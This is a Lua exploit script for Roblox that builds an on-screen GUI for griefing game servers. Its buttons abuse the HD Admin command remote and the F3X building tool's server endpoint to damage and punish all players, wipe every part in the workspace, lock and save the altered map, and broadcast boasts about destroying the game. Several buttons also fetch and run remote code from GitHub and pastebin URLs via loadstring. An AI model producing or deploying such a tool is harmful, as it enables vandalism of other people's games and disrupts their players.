-- localmaze gui creator

local player = game.Players.LocalPlayer
local char = player.Character 
-- the part above isnt mine




-- Instances: 7 | Scripts: 0 | Modules: 0 | Tags: 1
local CollectionService = game:GetService("CollectionService");
local G2L = {};


function hd(cmd)
game:GetService("ReplicatedStorage"):WaitForChild("HDAdminHDClient"):WaitForChild("Signals"):WaitForChild("RequestCommandSilent"):InvokeServer(";".. cmd)
end

function newbutton(name,text,code)
G2L[name] = Instance.new("TextButton", G2L["ScrollingFrame_3"]);
G2L[name]["TextWrapped"] = true;
G2L[name]["BorderSizePixel"] = 0;
G2L[name]["TextSize"] = 10;
G2L[name]["TextScaled"] = true;
G2L[name]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L[name]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L[name]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
G2L[name]["BackgroundTransparency"] = 0.3;
G2L[name]["Size"] = UDim2.new(0, 92, 0, 70);
G2L[name]["Text"] = text;
G2L[name].MouseButton1Click:Connect(code)
end







-- Players.NotaPlayer4lt.PlayerGui.ScreenGui
G2L["ScreenGui_1"] = Instance.new("ScreenGui", game.CoreGui);
G2L["ScreenGui_1"]["IgnoreGuiInset"] = true;
G2L["ScreenGui_1"]["ScreenInsets"] = Enum.ScreenInsets.DeviceSafeInsets;
G2L["ScreenGui_1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;

-- Tags
CollectionService:AddTag(G2L["ScreenGui_1"], [[main]]);

-- Players.NotaPlayer4lt.PlayerGui.ScreenGui.Frame
G2L["Frame_2"] = Instance.new("Frame", G2L["ScreenGui_1"]);
G2L["Frame_2"]["BorderSizePixel"] = 2;
G2L["Frame_2"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["Frame_2"]["Size"] = UDim2.new(0, 436, 0, 430);
G2L["Frame_2"]["Position"] = UDim2.new(0, 294, 0, 98);
G2L["Frame_2"]["BorderColor3"] = Color3.fromRGB(255, 255, 255);


-- Players.NotaPlayer4lt.PlayerGui.ScreenGui.Frame.ScrollingFrame
G2L["ScrollingFrame_3"] = Instance.new("ScrollingFrame", G2L["Frame_2"]);
G2L["ScrollingFrame_3"]["BorderSizePixel"] = 0;
G2L["ScrollingFrame_3"]["BackgroundColor3"] = Color3.fromRGB(50, 50, 50);
G2L["ScrollingFrame_3"]["Size"] = UDim2.new(0, 424, 0, 338);
G2L["ScrollingFrame_3"]["Position"] = UDim2.new(0, 6, 0, 52);


-- Players.NotaPlayer4lt.PlayerGui.ScreenGui.Frame.ScrollingFrame.UIGridLayout
G2L["UIGridLayout_4"] = Instance.new("UIGridLayout", G2L["ScrollingFrame_3"]);
G2L["UIGridLayout_4"]["CellSize"] = UDim2.new(0, 100, 0, 38);


-- Players.NotaPlayer4lt.PlayerGui.ScreenGui.Frame.ScrollingFrame.TextButton



-- Players.NotaPlayer4lt.PlayerGui.ScreenGui.Frame.TextLabel2
G2L["TextLabel2_6"] = Instance.new("TextLabel", G2L["Frame_2"]);
G2L["TextLabel2_6"]["TextWrapped"] = true;
G2L["TextLabel2_6"]["BorderSizePixel"] = 0;
G2L["TextLabel2_6"]["TextSize"] = 24;
G2L["TextLabel2_6"]["TextScaled"] = true;
G2L["TextLabel2_6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["TextLabel2_6"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["TextLabel2_6"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["TextLabel2_6"]["BackgroundTransparency"] = 1;
G2L["TextLabel2_6"]["RichText"] = true;
G2L["TextLabel2_6"]["Size"] = UDim2.new(0, 430, 0, 38);
G2L["TextLabel2_6"]["Text"] = [[Credits: k00lkidd81 and anyone else!]];
G2L["TextLabel2_6"]["Name"] = [[TextLabel2]];
G2L["TextLabel2_6"]["Position"] = UDim2.new(0, 2, 0, 390);


-- Players.NotaPlayer4lt.PlayerGui.ScreenGui.Frame.TextLabel
G2L["TextLabel_7"] = Instance.new("TextLabel", G2L["Frame_2"]);
G2L["TextLabel_7"]["TextWrapped"] = true;
G2L["TextLabel_7"]["BorderSizePixel"] = 0;
G2L["TextLabel_7"]["TextSize"] = 24;
G2L["TextLabel_7"]["TextScaled"] = true;
G2L["TextLabel_7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["TextLabel_7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["TextLabel_7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["TextLabel_7"]["BackgroundTransparency"] = 1;
G2L["TextLabel_7"]["RichText"] = true;
G2L["TextLabel_7"]["Size"] = UDim2.new(0, 428, 0, 44);
G2L["TextLabel_7"]["Text"] = [[N0tagui FDEA Incident V2
By @NotaPlayer4lt]];
G2L["TextLabel_7"]["Position"] = UDim2.new(0, 4, 0, 2);


G2L["UID"] = Instance.new("UIDragDetector",G2L["Frame_2"])

newbutton("Skybox","Skybox",function()
    pcall(loadstring(game:HttpGet("https://raw.githubusercontent.com/pedroluckygod/Yes/refs/heads/main/f3x_n0ta")))()
end)

newbutton("Decals","Decals",function()
    pcall(loadstring(game:HttpGet("https://raw.githubusercontent.com/pedroluckygod/Yes/refs/heads/main/f3xn0tadecals")))()
end)

newbutton("Hint","Hint",function()
    hd('hint NotaPlayer was here')
end)

newbutton("Message","Message",function()
    hd("m NotaPlayer Destroyed The Game!!")
end)
newbutton("RE","RE",function()
    hd("re")
end)
newbutton("R6","R6",function()
    hd("r6")
end)
newbutton("F3X","F3X",function()
    hd("btools")
end)
newbutton("Damage","Damage All",function()
    hd("damage all 30")
end)
newbutton("Sword","Sword All",function()
    hd("sword all")
end)
newbutton("Katana","Cool Katana",function()
   hd("insert 246270069") 
end)
newbutton("Car","Car",function()
    hd("insert 6433323089")
end)
newbutton("GR","City Spam",function()
    for i = 1,5 do
    hd("insert 13168370735")
    wait(0.3)
    end
end)
newbutton("RockeTL","Rocket Launcher",function()
    hd("insert 47637")
end)
newbutton("k81_gui","k00lkidd81 gui",function()
    loadstring(game:HttpGet("https://pastebin.com/raw/U0zwKSJK"))()
end)
newbutton("ClearMap","Clear Map",function()
    hd("clear")
end)
newbutton("rl","Restore Lighting",function()
    hd("undisco")
    hd("fog 9999999")
    hd("fogcolor white")
end)
newbutton("RealmBeta","Realm",function()
    local tool
    
    
    
    
    
    for _,v in player:GetDescendants() do
        if v.Name == "SyncAPI" then
            tool = v.Parent
        end
    end
    for _, v in ipairs(char:GetChildren()) do
        if v:FindFirstChild("SyncAPI") then
            tool = v.Parent
        end
    end
    remote = tool.SyncAPI.ServerEndpoint -- this part isnt mine
    
 

function resize(obj,cf,size)
    local args = {
	"SyncResize",
		{{
			Part = obj,
			CFrame = cf,
			Size = size
			}}
}
remote:InvokeServer(unpack(args))
end

function delete(obj)
  local args = {
      [1] = "Remove",
      [2] = {
          [1] = obj
      }
  }
remote:InvokeServer(unpack(args))
end

function color(part,color)
local args = {
	"SyncColor",
	{
		{
			Part = part;
			UnionColoring = true;
			Color = color
		}
	}
}
remote:InvokeServer(unpack(args))
end

function ntexture(part,face)
local args = {
	"CreateTextures",
	{
		{
			Part = part,
			Face = Enum.NormalId.Front,
			TextureType = "Decal"
		}
	}
}
remote:InvokeServer(unpack(args))
end

function rtexure(part)
local args = {
	"SyncTexture",
	{
		{
			Part = part,
			Face = Enum.NormalId.Front,
			TextureType = "Decal",
			Texture = "rbxassetid://77306121234298"
		}
	}
}
remote:InvokeServer(unpack(args))
end

function stex(part)
    local args = {
	"CreateTextures",
	{
		{
			Part = part,
			Face = Enum.NormalId.Top,
			TextureType = "Decal"
		}
	}
}
remote:InvokeServer(unpack(args))

local args = {
	"SyncTexture",
	{
		{
			Part = part,
			Face = Enum.NormalId.Top,
			TextureType = "Decal",
			Texture = "rbxassetid://5090068838"
		}
	}
}
remote:InvokeServer(unpack(args))
end


hd("punish all")
 for _, v in workspace:GetChildren() do
     if v:IsA("BasePart") or v:IsA("SpawnLocation") or v:IsA("Model") or v:IsA("Folder") then
         delete(v)
    end
 end
 
 
 
local pos = CFrame.new(0,5,0)
local basep = remote:InvokeServer("CreatePart","Normal",pos,workspace)
resize(basep, pos, vector.create(200,2,200))
color(basep, Color3.new(0,0.5,0))
local spawnn = remote:InvokeServer("CreatePart","Spawn",CFrame.new(0,6,0),workspace)
resize(spawnn,CFrame.new(0,6,0),vector.create(5,1,5))
color(spawnn,Color3.new(0,0,0))
stex(spawnn)

local rind = remote:InvokeServer("CreatePart","Normal",CFrame.new(10,10,5),workspace)
resize(rind, CFrame.new(10,10,5), vector.create(17,10,1))
color(rind,Color3.new(0,0,0))

ntexture(rind)
rtexure(rind,"77306121234298")

wait()

hd("respawn all")
hd("lockmap")
hd("savemap")

end)

newbutton("uhh","wth",function()
  hd("music 99550726533828 ;volume inf")
end)
newbutton("idkbro","avocado ys [R15]",function()
    hd("size me 0. ;potatohead ;paint me green")
end)
newbutton("ok","raining pipes",function() 
    
for _,v in player:GetDescendants() do
        if v.Name == "SyncAPI" then
            tool = v.Parent
        end
    end
    for _, v in ipairs(char:GetChildren()) do
        if v:FindFirstChild("SyncAPI") then
            tool = v.Parent
        end
    end
    remote = tool.SyncAPI.ServerEndpoint -- this part is not mine
    
    
    
    
    
function doit(part)
    
    
    local args = {
	"CreateMeshes",
	{
		{
			Part = part
		}
	}
}
remote:InvokeServer(unpack(args))
    
    local args = {
	"SyncMesh",
	{
		{
			Scale = vector.create(-20, -20, -20),
			Part = part
		}
	}
}

remote:InvokeServer(unpack(args))
local args = {
	"SyncMesh",
	{
		{
			MeshType = Enum.MeshType.FileMesh,
			Part = workspace:WaitForChild("Part")
		}
	}
}
remote:InvokeServer(unpack(args))

local args = {
	"SyncMesh",
	{
		{
			Part = part,
			MeshId = "rbxassetid://17551699806"
		}
	}
}
remote:InvokeServer(unpack(args))

remote:InvokeServer(unpack(args))
local args = {
	"SyncAnchor",
	{
		{
			Part = part,
			Anchored = false
		}
	}
}
remote:InvokeServer(unpack(args))
end

 


for i = 1,30 do
local newpart = remote:InvokeServer("CreatePart","Normal",CFrame.new(math.random(-500,500),200,math.random(-500,500)),workspace)
doit(newpart)
end

wait(0.2)



end)
newbutton("destroygui","Destroy Gui",function()
    G2L["ScreenGui_1"]:Destroy()
    end)


newbutton("unc","uncmdbar2 others",function()
    hd("uncmdbar2 others")
end)


return G2L["ScreenGui_1"], require;

